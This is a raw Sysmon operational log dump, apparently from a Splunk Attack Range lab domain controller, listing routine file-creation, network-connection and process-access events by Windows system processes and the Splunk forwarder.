23542300x80000000000000001694339Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:47.379{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C6787872C503144EE9170585B8B1AB3,SHA256=C1720A22088A355989FF71DF1F3AE1FEB20A6B34BDBF151F0E482B196D10CDF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001694341Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:48.952{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1DAF9D72EE151E33FDD78CB926BE285E,SHA256=68AC39A67D48AB72E35B387F6EDC36DF07F7517638E7E7490ACD4B193C56228B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001694340Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:48.444{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3D042B5F6BFC3D207002D717ABB2BDB,SHA256=206F13B2C729FAC77AFBA0A651F9198F6F7A26AB46B67606F23A2BC1EB5AC391,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001694345Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:41.424{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55106-false10.0.1.12-8000- 354300x80000000000000001694344Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:41.302{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-62700-true2001:500:200:0:0:0:0:bb.root-servers.net53domain 354300x80000000000000001694343Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:41.299{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local65336- 23542300x80000000000000001694342Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:49.488{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DF259BAAF4EDD250B18A5A04943FED3,SHA256=09C63CCBB86E0ADDBD2B78E2F22194439273E2AAAB83A2CBDD957CBF1131D2BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001694348Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:42.330{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local65336- 23542300x80000000000000001694347Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:50.504{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56DC7DA8F1D2AF9A1AFA551344F47C5B,SHA256=109AD84A61C4DF7F6181BB3A1E1602B980339AE02A8FC3A90CD73047AE1CE8D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001694346Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:50.020{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=102B918C5579C01D74C6D7965044469C,SHA256=F191B8567BE51EF93DFBE307BA6FC85B6D136146D432E2A3567482835728CEC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001694350Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:51.707{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2B777C83804246A7A5873FF0B7EE5B3,SHA256=92F8477847F9FABCDF64E712D775B28AA9AB2A170E968ED33F52483FC7DF6794,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001694349Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:51.504{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C0E371484470C86F07C14DD0B0E7001,SHA256=A068F60A7F29BC2822848E54B1384A9148F1E9AA6FDD862BC4CC455A4EC46DA0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001694352Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:44.533{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local51672- 23542300x80000000000000001694351Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:52.535{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC7EFA437FC1CC221828B9F4FCE9604E,SHA256=81A69A45D701B57F64BC816DA41ADB7AB398D54507B8FD978CEE57CCBA79CF7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001694355Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:53.552{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9D1173350180840181A3F75818DF672,SHA256=0CA6053DB37D716735B7367D8D798E754E7EE5739631C008E9F8FED330B3091B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001694354Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:53.473{05ADC7E1-229F-6039-1100-00000000AD01}1152NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C1D3CDF04D1DAE8057A6837EBB6B1F81,SHA256=1BB6F95770B1B2CA6973F70DECB82205647D0B2B4F7EE383BFDF9FC898F9F41E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001694353Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:53.207{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1D1F048456517BAE03DAC2CDD69F827D,SHA256=B47C83809081672980412842440314ADDCE830A3123C17F58C4504EF8DD6E929,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001694357Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:54.567{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE64F6A1AC28F2008A3AEE56AD3B37EF,SHA256=9F1F17DBBD0C0FCFCC53EDD91B6D152DA838FF0EC7D0812BCB4F92413D2DB6B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001694356Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:54.098{05ADC7E1-7946-6039-1610-00000000AD01}3144ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\9unhrnfd.default-release\datareporting\aborted-session-pingMD5=932D512FA9606ADCEED75A436F5C4FD5,SHA256=A625ECB3833F00B4DDC6401A4350822F2AA4A2D26961B327F0647ACE2BD12114,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001694424Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.988{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1D209631CE576C5BC1267CDABC0DC9E,SHA256=FEBA6BA021E449C473FA0040F89E258D7F91997DF3DF21BA9D9EF4916835F168,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001694423Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.950{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-7047-603D-4088-00000000AD01}8352C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694422Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.950{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-7047-603D-4088-00000000AD01}8352C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694421Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.943{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-7047-603D-4088-00000000AD01}8352C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694420Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.926{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-7047-603D-4088-00000000AD01}8352C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001694419Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.926{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-7047-603D-4088-00000000AD01}8352C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001694418Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.926{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-7047-603D-4088-00000000AD01}8352C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694417Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.910{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-7047-603D-3F88-00000000AD01}5636C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694416Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.910{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-7047-603D-3F88-00000000AD01}5636C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694415Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.910{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-7047-603D-3F88-00000000AD01}5636C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694414Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.895{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-7047-603D-3F88-00000000AD01}5636C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001694413Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.895{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-7047-603D-3F88-00000000AD01}5636C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001694412Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.895{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-7047-603D-3F88-00000000AD01}5636C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694411Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.879{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694410Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.879{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694409Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.879{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968500C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694408Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.879{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968500C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694407Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.863{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0aa5|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694406Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.863{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b09be|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694405Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.863{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694404Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 